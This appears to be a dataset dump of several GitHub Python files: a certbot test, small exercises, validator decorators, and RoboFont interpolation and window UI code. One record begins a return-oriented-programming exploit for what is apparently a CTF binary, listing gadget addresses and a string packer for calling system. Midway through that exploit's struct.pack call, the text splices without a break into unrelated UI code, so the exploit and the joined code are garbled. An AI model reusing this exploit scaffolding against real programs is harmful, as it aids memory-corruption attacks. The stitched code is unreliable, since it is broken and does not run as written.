self._setUp_client_with_mock(API_ERROR)\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record_zone_not_found(self, unused_credential_mock):\n client, unused_changes = self._setUp_client_with_mock([{'managedZones': []},\n {'managedZones': []}])\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record_error_during_delete(self, unused_credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n changes.create.side_effect = API_ERROR\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n def test_get_project_id(self):\n from certbot_dns_google.dns_google import _GoogleClient\n\n response = DummyResponse()\n response.status = 200\n\n with mock.patch('httplib2.Http.request', return_value=(response, 1234)):\n project_id = _GoogleClient.get_project_id()\n self.assertEqual(project_id, 1234)\n\n failed_response = DummyResponse()\n failed_response.status = 404\n\n with mock.patch('httplib2.Http.request',\n return_value=(failed_response, \"some detailed http error response\")):\n self.assertRaises(ValueError, _GoogleClient.get_project_id)\n\n with mock.patch('httplib2.Http.request', side_effect=ServerNotFoundError):\n self.assertRaises(ServerNotFoundError, _GoogleClient.get_project_id)\n\n\nclass DummyResponse(object):\n \"\"\"\n Dummy object to create a fake HTTPResponse (the actual one requires a socket and we only\n need the status attribute)\n \"\"\"\n def __init__(self):\n self.status = 200\n\nif __name__ == \"__main__\":\n unittest.main() # pragma: no cover\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/11259_dns_google_test.py","file_name":"11259_dns_google_test.py","file_ext":"py","file_size_in_byte":11381,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"18531217967","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nG = nx.Graph()\n\nfor node in range(1, 9):\n G.add_node(node)\nfor (a, b) in ((1, 2), (1, 3), (1, 5), (1, 7), (2, 4), (2, 6), (3, 5), (3, 6), (3, 8), (4, 8)):\n G.add_edge(a, b)\n\nG.nodes(data=True)\nlist(G.nodes.data())\n\nG.edges(data=True)\nlist(G.edges.data())\n\nnx.draw(G, with_labels=True, node_size=400, node_shape='8', node_color='#42cbed',\n edge_color='#706f6f', style='dotted')\n\nplt.show()\nplt.savefig('graph.png')\n","repo_name":"KatarzynaLeja/Python","sub_path":"12/12_2.py","file_name":"12_2.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15636732161","text":"left = [-1]\r\nright = [100]\r\n\r\ndef push1(a,x):\r\n \r\n if left[0] + 1 < right[0]:\r\n left[0] += 1\r\n a[left[0]] = x\r\n \r\ndef push2(a,x):\r\n \r\n if left[0] < right[0] - 1:\r\n right[0] -= 1\r\n a[right[0]] = x\r\n \r\ndef pop1(a):\r\n \r\n if left[0] > -1:\r\n removed = a[left[0]]\r\n left[0] -= 1\r\n return removed\r\n \r\n else:\r\n return -1\r\n \r\ndef pop2(a):\r\n \r\n if right[0] < 100:\r\n removed = a[right[0]]\r\n right[0] += 1\r\n return removed\r\n \r\n else:\r\n return -1\r\n","repo_name":"suy1968/DATA-STRUCTURES-AND-ALGORITHMS","sub_path":"Stack/Implement 2 stack in an array.py","file_name":"Implement 2 stack in an array.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8651219272","text":"from __future__ import annotations\nfrom typing import Callable, Tuple, Any\nfrom functools import wraps\nfrom pathlib import Path\nimport string\n\n\ndef collector(pos: int, key: str, *args, **kwargs) -> Tuple[bool, Any, bool]:\n # noinspection PyBroadException\n try:\n if key in kwargs:\n collected = True\n use_args = False\n target = kwargs.get(key)\n elif pos is not None and args[pos] is not None:\n collected = True\n use_args = True\n target = args[pos]\n else:\n raise Exception\n except Exception: # if any exception, just report a failure to collect\n collected = False\n use_args = None\n target = None\n # noinspection PyUnboundLocalVariable\n return collected, target, use_args\n\n\ndef parameterize(decorator: Callable) -> Callable:\n \"\"\"\n Function for decorating decorators with parameters\n\n :param decorator: a decorator\n\n :type decorator: Callable\n \"\"\"\n\n def outer(*args, **kwargs) -> Callable:\n\n def inner(func: Callable) -> Callable:\n # noinspection PyArgumentList\n return decorator(func, *args, **kwargs)\n\n return inner\n\n return outer\n\n\n@parameterize\ndef convert_permitted_types_to_required(function: Callable,\n permitted: Tuple,\n required: Any,\n pos: int = 0,\n key: str = None) -> Callable:\n \"\"\"\n Decorator that converts a tuple of permitted types to type supported by the decorated method\n\n :param function: function to be decorated\n :type function: Callable\n :param permitted: permitted types\n :type permitted: tuple\n :param required: type required by code\n :type required: Any\n :param pos: index of argument to be converted\n :type pos: int\n :param key: keyword of argument to be converted\n :type key: str\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n\n collected, allowed_input, use_args = collector(pos, key, *args, **kwargs)\n\n if collected:\n if isinstance(allowed_input, permitted):\n allowed_input = required(allowed_input)\n\n if not isinstance(allowed_input, required):\n raise TypeError(f\"{pos}, {key}\")\n\n if use_args:\n args = amend_args(args, allowed_input, pos)\n else:\n kwargs[key] = allowed_input\n\n return function(*args, **kwargs)\n\n return decorator\n\n\n@parameterize\ndef validate_extension(function: Callable, required_extension: str, pos: int = 0, key: str = None) \\\n -> Callable: # noqa: U100\n \"\"\"\n Decorator for validating extension requirements\n\n :param function: function to be decorated\n :type function: Callable\n :param required_extension: required extension\n :type required_extension: str\n :param pos: index of the argument to be validated\n :type pos: int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n if not Path(args[pos]).suffix:\n args = amend_args(args, \"\".join([str(args[pos]), required_extension]), pos)\n if Path(args[pos]).suffix != required_extension:\n raise ValueError(f\"Input {pos}: filepath must contain the required extension {required_extension}\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\n@parameterize\ndef validate_matrix(function: Callable, pos: int = 0, key: str = None) -> Callable:\n \"\"\"\n Decorator for validating matrices\n\n :param function: function to be decorated\n :type function: Callable\n :param pos: index of the argument to be validated\n :type pos: int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n var_input = args[pos]\n if len(var_input.shape) != 2:\n raise AssertionError(f\"Input {pos}, {key}: required to be in matrix format\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\n@parameterize\ndef validate_filename(function: Callable, pos: int = 0, key: str = None) -> Callable: # noqa: U100\n \"\"\"\n Decorator for validating filenames\n\n :param function: function to be decorated\n :type function: Callable\n :param pos: index of the argument to be validated\n :type pos: int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n string_input = str(args[pos]).split(\"\\\\\")[-1]\n if not set(string_input) <= set(string.ascii_letters + string.digits + \".\" + \"_\"):\n raise ValueError(\"Invalid Filename: filenames are limited to standard letters and digits only.\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\ndef amend_args(arguments: Tuple, amendment: Any, pos: int = 0) -> Tuple:\n \"\"\"\n Function amends arguments tuple (~scary tuple mutation~)\n\n :param arguments: arguments to be amended\n :type arguments: tuple\n :param amendment: new value of argument\n :type amendment: Any\n :param pos: index of argument to be converted\n :type pos: int\n :return: amended arguments\n :rtype: Tuple\n \"\"\"\n\n arguments = list(arguments)\n arguments[pos] = amendment\n return tuple(arguments)\n\n\n@parameterize\ndef validate_evenly_divisible(function: Callable, numerator: int = 0, denominator: int = 1, axis: int = 1) -> Callable:\n \"\"\"\n Decorator for validating existence of paths\n\n :param function: function to be decorated\n :type function: Callable\n :param numerator: position of numerator for division\n :type numerator: int\n :param denominator: position of denominator for division\n :type denominator: int\n :param axis: axis of numerator to divide\n :type axis: int\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n numerator_val = args[numerator]\n denominator_val = args[denominator]\n\n if numerator_val.shape[axis] // denominator_val != numerator_val.shape[axis] / denominator_val:\n raise AssertionError(\"error\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\n@parameterize\ndef validate_tensor(function: Callable, pos: int = 0, key: str = None) -> Callable:\n \"\"\"\n Decorator to assert argument is a tensor\n\n :param function: function to be decorated\n :type function: Callable\n :param pos: index of the argument to be validated\n :type pos: int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n var_input = args[pos]\n if len(var_input.shape) != 3:\n raise AssertionError(f\"{pos}, {key}\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n","repo_name":"darikoneil/CalSciPy","sub_path":"CalSciPy/_validators.py","file_name":"_validators.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4268396811","text":"import sys\n\ninput = sys.stdin.readline\n\ns = int(input())\n\ncur = 0\n\ni = 1\nwhile True:\n cur += i\n if cur > s:\n i = i - 1\n break\n elif cur == s:\n break\n i += 1\n\n\nprint(i)\n","repo_name":"Koeunseooooo/Algorithm","sub_path":"백준/알고리즘다지기/1789.py","file_name":"1789.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29485936387","text":"import struct\n\ndata_section = 0x601050\nsystem_call = 0x0000000000400810\nmov_r14_r15 = 0x0000000000400820\npop_r14_pop_r15 = 0x0000000000400890 # pop r14; pop r15; ret;\npop_rdi = 0x0000000000400893 # pop rdi; ret;\n\ndef stringpacker(addr):\n return str(struct.pack(\"'\n self.interpolationProblemMessage = self.textBox((0,0,0,0),self.interpolationProblemMessageTxt,alignment=\"center\",textColor=(1,0,0,1),fontSize=(\"Monaco\",10))\n self.interpolationProblemMessage.show(False)\n\n addObserver(self, \"mouseDragged\",\"MT.prevMouseDragged\")\n addObserver(self, \"updateFontsCallback\",\"MT.designspace.fontMastersChanged\")\n addObserver(self, \"rightMouseDownCallback\",\"MT.prevRightMouseDown\")\n addObserver(self, \"currentGlyphChangedCallback\", \"currentGlyphChanged\")\n\n def updateInfo(self):\n\n horValue = self.currentLoc.get(self.windowAxes[\"horizontal axis\"])\n self.horAxisInfo.set(f'{self.windowAxes[\"horizontal axis\"]} - {horValue}')\n verValue = self.currentLoc.get(self.windowAxes[\"vertical axis\"])\n self.verAxisInfo.set(f'{self.windowAxes[\"vertical axis\"]} - {verValue}')\n\n def textBox(self,posSize,title,textColor,fontSize,alignment=\"left\"):\n if isinstance(textColor,tuple):\n color =AppKit.NSColor.colorWithCalibratedRed_green_blue_alpha_(*textColor)\n else:\n color = textColor\n font = AppKit.NSFont.fontWithName_size_(*fontSize)\n #cell.setTextColor_(color)\n txtBox = TextBox(posSize,title,alignment=alignment)\n nsTextFiled = txtBox.getNSTextField()\n nsTextFiled.setTextColor_(color)\n nsTextFiled.setFont_(font)\n return txtBox\n\n def updateFontsCallback(self, sender):\n if sender is not None:\n self.designspace = sender['designspace']\n \n def currentGlyphChangedCallback(self,sender):\n if CurrentGlyph() is not None:\n self.glyphName = CurrentGlyph().name\n self.interpolationProblemMessageTxt = f'glyph \"{self.glyphName}\" '\n\n self.setGlyph(self.glyphName, self.currentLoc)\n\n def rightMouseDownCallback(self,sender):\n for l in self.rightClickGroup:\n l.setSelection([])\n\n def menuItemCallback(self,sender):\n if sender.getSelection():\n curr_axisList = sender\n if curr_axisList.axis == \"vertical axis\":\n second_axisList = self.rightClickGroup[0]\n elif curr_axisList.axis == \"horizontal axis\":\n second_axisList = self.rightClickGroup[1]\n rowIndex = curr_axisList.getSelection()[0]\n allitems = curr_axisList.get()\n secondAllItems = second_axisList.get()\n secondItem = secondAllItems[rowIndex]\n item = allitems[rowIndex]\n\n if secondItem[second_axisList.axis] == item[curr_axisList.axis] and secondItem[\"set\"] == self.check:\n secondItem[\"set\"] = \"\"\n self.windowAxes[second_axisList.axis] = None\n curr_axisList.set(secondAllItems)\n\n # popupbutton imitation:\n itemChoosenAxisName = item[curr_axisList.axis]\n if item[\"set\"] != self.check:\n item[\"set\"] = self.check\n self.windowAxes[curr_axisList.axis] = itemChoosenAxisName\n else:\n item[\"set\"] = \"\"\n self.windowAxes[curr_axisList.axis] = None\n\n for other_item in allitems:\n if item != other_item:\n other_item[\"set\"] = \"\"\n curr_axisList.set(allitems)\n second_axisList.setSelection([])\n curr_axisList.setSelection([])\n self.updateInfo()\n\n def sliderCallback(self, sender):\n self.currentLoc[sender.axisName] = round(sender.get())\n\n self.setGlyph(self.glyphName,self.currentLoc)\n self.updateInfo()\n\n def _setContextualMenu(self):\n y,x,p = (10,10,10)\n axisPopUpMenuItem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\"axisPopUp\", '', '')\n columnDescriptions_hor = [{\"title\": \"set\",\"width\":8},{\"title\": \"horizontal axis\"}]\n columnDescriptions_ver = [{\"title\": \"set\",\"width\":8},{\"title\": \"vertical axis\"}]\n # group is going to be a container for\n # two lists, that will behave\n # like a popup buttons\n group = Group((0,0,220+3*p,100))\n group._list_hor = MTList((x, y, 110, -p), self.axesList_hor, columnDescriptions=columnDescriptions_hor,doubleClickCallback=self.menuItemCallback,transparentBackground=True,)\n group._list_hor.axis = \"horizontal axis\"\n group._list_ver = MTList((x+110+p, y, 110, -p), self.axesList_ver, columnDescriptions=columnDescriptions_ver,doubleClickCallback=self.menuItemCallback,transparentBackground=True,)\n group._list_ver.axis = \"vertical axis\"\n self.rightClickGroup = [group._list_hor,group._list_ver]\n # setting the appearance of the lists\n for l in self.rightClickGroup:\n l.setSelection([])\n NSTable = l.getNSTableView()\n NSTable.setSelectionHighlightStyle_(1)\n NSTable.tableColumns()[0].headerCell().setTitle_(\"\")\n sliderItems = []\n\n self.sliderItems = []\n for i,item in enumerate(self.axesList_ver):\n axis_name = item[\"vertical axis\"]\n minValue = self.axesInfo[axis_name][\"minimum\"]\n maxValue = self.axesInfo[axis_name][\"maximum\"]\n value = self.currentLoc[axis_name]\n sliderItem = MTSliderAxisMenuItem(axis_name, value, minValue, maxValue, self.sliderCallback)\n self.sliderItems.append(sliderItem)\n\n # Building NSMenu\n view = group.getNSView()\n axisPopUpMenuItem.setView_(view)\n\n builder = MenuBuilder([\n axisPopUpMenuItem,\n ]+[item for item in self.sliderItems])\n\n self.menu = builder.getMenu()\n self.menu.setMinimumWidth_(120)\n self.menu.setAutoenablesItems_(False)\n view.setFrame_(((0, 0), (220+3*p, 2*p+23+23*len(self.axesList_hor))))\n self.getNSBox().rightMenu = self.menu\n\n\n def setDesignSpace(self, designspace):\n\n self.designspace = designspace\n self.glyphName = \"A\"\n self.axesInfo = {}\n for axisInfo in self.designspace.getSerializedAxes():\n info = {}\n info[\"minimum\"] = axisInfo[\"minimum\"]\n info[\"maximum\"] = axisInfo[\"maximum\"]\n info[\"range\"] = axisInfo[\"maximum\"]-axisInfo[\"minimum\"]\n\n self.axesInfo[axisInfo['name']] = info\n if designspace.findDefault() is not None:\n self.currentLoc = designspace.findDefault().location\n self.lastAllLocations = deepcopy(designspace.findDefault().location)\n else:\n self.currentLoc = {}\n self.lastAllLocations = {name:0 for name in self.axesInfo.keys()}\n self.axesList_hor = []\n self.axesList_ver = []\n for axis in designspace.getSerializedAxes():\n self.axesList_hor += [{\"set\":\"\",\"horizontal axis\":axis['name']}]\n self.axesList_ver += [{\"set\":\"\",\"vertical axis\":axis['name']}]\n self.getDefaultLoc = 0 # later replace it with special finding default loc\n self._setContextualMenu()\n self.setGlyph(self.glyphName,self.currentLoc)\n\n def setGlyph(self,name, loc=None):\n if loc is None or loc == {}:\n return\n if name is None:\n return\n for axisname in loc:\n self.lastAllLocations[axisname] = loc[axisname]\n self.updateInfo()\n try:\n self.interpolationProblemMessage.show(False)\n self.glyphView.setGlyph(self._getInterpolation(name, self.lastAllLocations))\n except:\n self.interpolationProblemMessage.show(True)\n\n def _updateSliders(self):\n if hasattr(self, \"sliderItems\"):\n for item in self.sliderItems:\n slider = item.getSlider()\n value = self.lastAllLocations[slider.axisName]\n slider.set(value)\n\n def mouseDragged(self, data):\n _x,_y,_w,_h = self.getPosSize()\n x,y = data[\"cursorpos\"]\n w,h = data[\"framesize\"]\n w,h = (w+_w, h+_h) ## hardcoded, still didn't figured out\n horizontalAxisName = self.windowAxes[\"horizontal axis\"]\n verticalAxisName = self.windowAxes[\"vertical axis\"]\n horizontalAxisValue = None\n verticalAxisValue = None\n currentLoc = {}\n\n\n if horizontalAxisName is not None:\n axis_info = self.axesInfo[horizontalAxisName]\n horizontalAxisValue = axis_info[\"minimum\"] + x/w * axis_info[\"range\"]\n if self.roundLocations: horizontalAxisValue = round(horizontalAxisValue)\n if verticalAxisName is not None:\n axis_info = self.axesInfo[verticalAxisName]\n verticalAxisValue = axis_info[\"minimum\"] + y/h * axis_info[\"range\"]\n if self.roundLocations: verticalAxisValue = round(verticalAxisValue)\n if horizontalAxisValue is not None:\n currentLoc[horizontalAxisName] = horizontalAxisValue\n if verticalAxisValue is not None:\n currentLoc[verticalAxisName] = verticalAxisValue\n\n self.currentLoc = currentLoc\n self.setGlyph(self.glyphName, self.currentLoc)\n self._updateSliders()\n\n\n def _getInterpolation(self,name,loc):\n instanceDescriptor = InstanceDescriptor()\n instanceDescriptor.location = loc\n try:\n glyphMutator = self.designspace.getGlyphMutator(name, decomposeComponents=True)\n glyphMath = glyphMutator.makeInstance(instanceDescriptor.location, bend=True)\n glyph = RGlyph().naked()\n iterGlyph = glyphMath.extractGlyph(glyph, glyph.getPointPen(), onlyGeometry=True)\n if iterGlyph is not None:\n glyph = RGlyph()\n pen = glyph.getPen()\n iterGlyph.draw(pen)\n glyph.moveBy((-glyphMath.width/2,-20))\n glyph.transformBy((.4, 0, 0, .4, 0, 0))\n return glyph\n else:\n return glyph\n except:\n print(name, \"doesn't interpolate\")\n\n\n def mainWindowClose(self):\n removeObserver(self, \"MT.prevMouseDragged\")\n removeObserver(self, \"MT.prevRightMouseDown\")\n removeObserver(self, \"currentGlyphChanged\")\n\n\nclass MTToolbar(Group):\n \"\"\"\n items = [{\n dict(objname=\"objname\",\n imageObject=imageObject,\n toolTip=\"toolTip\",\n callback=callback)\n }]\n \"\"\"\n\n def __init__(self, pos, items, itemSize, padding=0):\n\n x, y = pos\n w = len(items) * itemSize + (len(items) - 1) * padding\n posSize = (x, y, w, itemSize)\n super().__init__(posSize)\n\n self.toolNames = []\n self.itemSize = itemSize\n self.padding = padding\n x = 0\n for item in items:\n posSize = (x, 0, itemSize, itemSize)\n self.toolNames += [item[\"objname\"]]\n\n toolbarItemObj = self.ToolbarItem(\n posSize, imageObject=item[\"imageObject\"], toolTip=item[\"toolTip\"], callback=item[\"callback\"])\n setattr(self, item[\"objname\"], toolbarItemObj)\n x += itemSize + padding\n self.len = len(items)\n\n def setPosSize(self, posSize):\n x, y, w, h = posSize\n oldx, oldy, oldw, oldh = self.getPosSize()\n standardWidth = self.len * self.itemSize + self.padding * self.len - 1\n\n super().setPosSize((oldx, oldy, w, h))\n if w > standardWidth:\n for i, objName in enumerate(self.toolNames):\n toolbarItem = getattr(self, objName)\n item_x, item_y, item_w, item_h = toolbarItem.getPosSize()\n factor = w / standardWidth\n item_x = (w - standardWidth) / 2 + i * item_w\n toolbarItem.setPosSize((item_x, item_y, item_w, item_h))\n elif w < standardWidth:\n for i, objName in enumerate(self.toolNames):\n toolbarItem = getattr(self, objName)\n item_x, item_y, item_w, item_h = toolbarItem.getPosSize()\n factor = w / standardWidth\n item_h = factor * self.itemSize\n item_w = w / self.len\n item_y = self.itemSize / 2 - item_h / 2\n item_x = i * item_w\n\n toolbarItem.setPosSize((item_x, item_y, item_w, item_h))\n toolbarItem.getNSButton().setImageScaling_(factor)\n\n def ToolbarItem(self, posSize, imageObject=None, toolTip=None, callback=None):\n toolbaritem = GradientButton(posSize, imageObject=imageObject, bordered=False,\n callback=self.toolbarItemStatusUpdateCB)\n if toolTip is not None:\n toolbaritem.getNSButton().setToolTip_(toolTip)\n toolbaritem.status = False\n if callback is not None:\n toolbaritem.callback = callback\n return toolbaritem\n\n def toolbarItemStatusUpdateCB(self, sender):\n # creating checkbox functionality of btns in Tools Group\n buttonObject = sender.getNSButton()\n if sender.status:\n sender.status = False\n buttonObject.setBordered_(False)\n else:\n sender.status = True\n buttonObject.setBordered_(True)\n\n sender.callback(sender) # calling custom toggle callback\n\nclass MTSheet(Sheet):\n pass\n # def __init__(self, posSize, parentWindow, title=\"\", minSize=None, maxSize=None, textured=False,\n # autosaveName=None, closable=True, miniaturizable=True, initiallyVisible=True,\n # fullScreenMode=None, titleVisible=True, fullSizeContentView=False, screen=None):\n # if isinstance(parentWindow, Window):\n # parentWindow = parentWindow._window\n # self.parentWindow = parentWindow\n # textured = bool(parentWindow.styleMask() & AppKit.NSTexturedBackgroundWindowMask)\n #\n # mask = AppKit.NSHUDWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSBorderlessWindowMask\n # if closable:\n # mask = mask | AppKit.NSClosableWindowMask\n # if miniaturizable:\n # mask = mask | AppKit.NSMiniaturizableWindowMask\n # if minSize or maxSize:\n # mask = mask | AppKit.NSResizableWindowMask\n # if textured:\n # mask = mask | AppKit.NSTexturedBackgroundWindowMask\n # if fullSizeContentView and osVersionCurrent >= osVersion10_10:\n # mask = mask | AppKit.NSFullSizeContentViewWindowMask\n # # start the window\n # ## too magical?\n # if len(posSize) == 2:\n # l = t = 100\n # w, h = posSize\n # cascade = True\n # else:\n # l, t, w, h = posSize\n # cascade = False\n # if screen is None:\n # screen = AppKit.NSScreen.mainScreen()\n # frame = _calcFrame(screen.visibleFrame(), ((l, t), (w, h)))\n # self._window = self.nsWindowClass.alloc().initWithContentRect_styleMask_backing_defer_screen_(\n # frame, mask, AppKit.NSBackingStoreBuffered, False, screen)\n # if autosaveName is not None:\n # # This also sets the window frame if it was previously stored.\n # # Make sure we do this before cascading.\n # self._window.setFrameAutosaveName_(autosaveName)\n # if cascade:\n # self._cascade()\n # if minSize is not None:\n # self._window.setMinSize_(minSize)\n # if maxSize is not None:\n # self._window.setMaxSize_(maxSize)\n # self._window.setTitle_(title)\n # self._window.setLevel_(self.nsWindowLevel)\n # self._window.setReleasedWhenClosed_(False)\n # self._window.setDelegate_(self)\n # self._bindings = {}\n # self._initiallyVisible = initiallyVisible\n # # full screen mode\n # if osVersionCurrent >= osVersion10_7:\n # if fullScreenMode is None:\n # pass\n # elif fullScreenMode == \"primary\":\n # self._window.setCollectionBehavior_(AppKit.NSWindowCollectionBehaviorFullScreenPrimary)\n # elif fullScreenMode == \"auxiliary\":\n # self._window.setCollectionBehavior_(AppKit.NSWindowCollectionBehaviorFullScreenAuxiliary)\n # # titlebar visibility\n # if osVersionCurrent >= osVersion10_10:\n # if not titleVisible:\n # self._window.setTitleVisibility_(AppKit.NSWindowTitleHidden)\n # else:\n # self._window.setTitleVisibility_(AppKit.NSWindowTitleVisible)\n # # full size content view\n # self._window.setTitleVisibility_(False)\n # self._window.setTitlebarAppearsTransparent_(True)\n #\n # self.title = TextBox((0,2,-0,17),title,alignment=\"center\",sizeStyle=\"small\")\n\n\n\nclass MTWindowWrapper(Window):\n #appearance = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n nsWindowClass = MTWindow\n\n nsWindowStyleMask = AppKit.NSHUDWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSTitledWindowMask | AppKit.NSBorderlessWindowMask\n if osVersionCurrent >= osVersion10_14:\n appearanceDark = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameDarkAqua)\n appearanceLight = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n\n\n def __init__(self, posSize, title=\"\", minSize=None, maxSize=None, textured=False,\n autosaveName=None, closable=True, miniaturizable=True, initiallyVisible=True,\n fullScreenMode=None, titleVisible=True, fullSizeContentView=False, screen=None, darkMode=False):\n super().__init__(posSize, title=title, minSize=minSize, maxSize=maxSize, textured=textured,\n autosaveName=autosaveName, closable=closable, miniaturizable=miniaturizable, initiallyVisible=initiallyVisible,\n fullScreenMode=fullScreenMode, titleVisible=titleVisible, fullSizeContentView=fullSizeContentView, screen=screen)\n if osVersionCurrent >= osVersion10_14:\n if darkMode:\n self._window.setAppearance_(self.appearanceDark)\n else:\n self._window.setAppearance_(self.appearanceLight)\n\nclass MTFloatingWindowWrapper(Window):\n #appearance = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n # nsWindowClass = MTWindowWrapper\n nsWindowClass = AppKit.NSPanel\n nsWindowLevel = AppKit.NSFloatingWindowLevel\n\n # nsWindowStyleMask = AppKit.NSHUDWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSTitledWindowMask | AppKit.NSBorderlessWindowMask\n nsWindowStyleMask = AppKit.NSTitledWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSBorderlessWindowMask | AppKit.NSClosableWindowMask\n if osVersionCurrent >= osVersion10_14:\n appearanceDark = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameDarkAqua)\n appearanceLight = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n\n\n def __init__(self, posSize, title=\"\", minSize=None, maxSize=None, textured=False,\n autosaveName=None, closable=True, miniaturizable=True, initiallyVisible=True,\n fullScreenMode=None, titleVisible=True, fullSizeContentView=False, screen=None, darkMode=False, noTitleBar=False):\n super().__init__(posSize, title=title, minSize=minSize, maxSize=maxSize, textured=textured,\n autosaveName=autosaveName, closable=closable, miniaturizable=miniaturizable, initiallyVisible=initiallyVisible,\n fullScreenMode=fullScreenMode, titleVisible=titleVisible, fullSizeContentView=fullSizeContentView, screen=screen)\n self._window.setBecomesKeyOnlyIfNeeded_(True)\n self._window.standardWindowButton_(AppKit.NSWindowMiniaturizeButton).setHidden_(True)\n self._window.standardWindowButton_(AppKit.NSWindowZoomButton).setHidden_(True)\n if noTitleBar:\n self._window.setTitlebarAppearsTransparent_(True)\n self._window.setTitleVisibility_(0)\n if osVersionCurrent >= osVersion10_14:\n if darkMode:\n self._window.setAppearance_(self.appearanceDark)\n else:\n self._window.setAppearance_(self.appearanceLight)\n def show(self):\n \"\"\"\n Show the window if it is hidden.\n \"\"\"\n # don't make key!\n self._window.orderFront_(None)\n\n\nclass MTDialog(object):\n \"\"\"\n in subclass you have to describe self.w as instance of MTWindowWrapper (you can use class attr window for it)\n \"\"\"\n txtH = 17\n btnH = 24\n padding = (10,10,10)\n window = MTWindowWrapper\n settingsSheet = MTSheet\n toolbar = MTToolbar\n def __init__(self):\n self.w = None\n addObserver(self, 'closeDialogWithDesignSpaceWindow', 'MT.designspacewindow.windowClosed') # description\n\n def closeDialogWithDesignSpaceWindow(self, sender):\n self.w.close()\n\n\nclass MTFloatingDialog(object):\n \"\"\"\n in subclass you have to describe self.w as instance of MTWindowWrapper (you can use class attr window for it)\n \"\"\"\n txtH = 17\n btnH = 24\n padding = (10,10,10)\n window = MTFloatingWindowWrapper\n settingsSheet = MTSheet\n toolbar = MTToolbar\n def __init__(self):\n self.w = None\n addObserver(self, 'closeDialogWithDesignSpaceWindow', 'MT.designspacewindow.windowClosed') # description\n\n def closeDialogWithDesignSpaceWindow(self, sender):\n self.w.close()\n\n\nclass MTList(List):\n \"\"\"\n sepcialCellDescription = {column index:AppKit.NSTableCell subclass}\n \"\"\"\n nsTableViewClass = MTTableViewSubclass\n delegateClass = MTTableDelegate\n\n def __init__(self, posSize, items, dataSource=None, columnDescriptions=None, showColumnTitles=True,\n selectionCallback=None, doubleClickCallback=None, editCallback=None, menuCallback=None,\n enableDelete=False, enableTypingSensitivity=False,\n allowsMultipleSelection=True, allowsEmptySelection=True,\n allowsSorting=True,\n drawVerticalLines=False, drawHorizontalLines=False,\n autohidesScrollers=True, drawFocusRing=False, rowHeight=17,\n drawBorders=False,\n allowSelection=True,\n transparentBackground=False,\n selfDropSettings=None,\n selfWindowDropSettings=None,\n selfDocumentDropSettings=None,\n selfApplicationDropSettings=None,\n otherApplicationDropSettings=None,\n widthIsHeader=False,\n dragSettings=None,\n mainWindow=None,\n font=None,\n headerHeight=None,\n highlightDescriptions={},\n ):\n if items is not None and dataSource is not None:\n raise VanillaError(\"can't pass both items and dataSource arguments\")\n self._highlightDescriptions = highlightDescriptions\n self._rowNum = len(items)\n self._posSize = posSize\n self._enableDelete = enableDelete\n self._nsObject = getNSSubclass(self.nsScrollViewClass)(self)\n self._nsObject.setAutohidesScrollers_(autohidesScrollers)\n self._nsObject.setHasHorizontalScroller_(True)\n self._nsObject.setHasVerticalScroller_(True)\n self._nsObject.setBorderType_(NSBezelBorder)\n self._nsObject.setDrawsBackground_(False)\n\n self._setAutosizingFromPosSize(posSize)\n self._allowsSorting = allowsSorting\n # add a table view to the scroll view\n self._tableView = getNSSubclass(self.nsTableViewClass)(self)\n self._nsObject.setDocumentView_(self._tableView)\n # set up an observer that will be called by the bindings when a cell is edited\n self._editCallback = editCallback\n self._editObserver = self.nsArrayControllerObserverClass.alloc().init()\n\n 